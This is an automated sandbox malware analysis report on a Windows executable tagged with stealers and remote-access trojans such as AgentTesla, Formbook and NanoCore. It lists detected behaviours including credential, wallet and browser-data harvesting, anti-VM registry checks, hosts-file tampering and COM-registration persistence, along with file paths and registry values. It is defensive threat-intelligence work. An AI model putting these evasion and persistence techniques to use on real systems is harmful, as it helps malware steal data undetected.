Malware Analysis Report

2024-10-16 05:10

Sample ID 231123-r9q6hsad43
Target 4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
Tags
agenttesla flawedammyy formbook glupteba nanocore netsupport sy13 collection discovery dropper evasion keylogger loader persistence rat rootkit spyware stealer themida trojan upx ammyyadmin
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4731517b198414342891553881913565819509086b8154214462788c740b34c9

Threat Level: Known bad

The file 4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe was found to be: Known bad.

Malicious Activity Summary

agenttesla flawedammyy formbook glupteba nanocore netsupport sy13 collection discovery dropper evasion keylogger loader persistence rat rootkit spyware stealer themida trojan upx ammyyadmin

Ammyyadmin family

Formbook

AgentTesla

NetSupport

Glupteba

FlawedAmmyy RAT

NanoCore

AmmyyAdmin payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Formbook payload

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Modifies Windows Firewall

Blocklisted process makes network request

Unexpected DNS network traffic destination

.NET Reactor proctector

Reads data files stored by FTP clients

Checks BIOS information in registry

UPX packed file

Registers COM server for autorun

Deletes itself

Loads dropped DLL

Reads user/profile data of web browsers

Themida packer

Executes dropped EXE

Drops startup file

Checks computer location settings

Reads user/profile data of local email clients

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Creates a large amount of network flows

Accesses Microsoft Outlook profiles

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Drops Chrome extension

Looks up external IP address via web service

Manipulates WinMonFS driver.

Accesses Microsoft Outlook accounts

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

NSIS installer

Modifies registry class

Checks processor information in registry

Suspicious behavior: LoadsDriver

Delays execution with timeout.exe

Suspicious behavior: SetClipboardViewer

Uses Task Scheduler COM API

outlook_win_path

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of SetWindowsHookEx

Script User-Agent

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious use of FindShellTrayWindow

Runs net.exe

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-23 14:53

Signatures

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-23 14:53

Reported

2023-11-23 15:39

Platform

win10v2004-20231020-en

Max time kernel

1828s

Max time network

2704s

Command Line

C:\Windows\Explorer.EXE

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

FlawedAmmyy RAT

trojan flawedammyy

Formbook

trojan spyware stealer formbook

Glupteba

loader dropper glupteba

NanoCore

keylogger trojan stealer spyware nanocore

NetSupport

rat netsupport

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\pinterests\XRJNZC.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\pinterests\XRJNZC.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smssc.lnk C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
N/A N/A C:\Program Files (x86)\Windows Multimedia Platform\smss.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\7fcf515fc374fde7a68255e8bee877a91963cbd54e86eaa222a0efb550cebb6b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\87dc39ac4be051faa3b71b9898b3cd39eaf8c78f5d59610ade25f63c306887ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\a7a33a377911477afe031d59a486e5ed432da1bd9fabfb9450a5951c7b2edd07.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\8ba6d00a29c4a11c7fcbf696066abb1e891aef6ab8bbc1f7ddd128da24a9a8f6.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\1324fa6536148b20c0452f0d0d3930c77ca32d2abef6bae3f2019931d4a9517c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-10\bf20e10da6c6c4a65f9e992ea5dc4618d09dda0b3fe9de72fbe6e62dc791b307.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5A07.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe N/A
N/A N/A C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hlieequfbakhoolq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe N/A
N/A N/A C:\ProgramData\pinterests\XRJNZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
N/A N/A C:\ProgramData\pinterests\XRJNZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
N/A N/A C:\ProgramData\pinterests\XRJNZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
N/A N/A C:\ProgramData\pinterests\XRJNZC.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\smssc\smssc.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
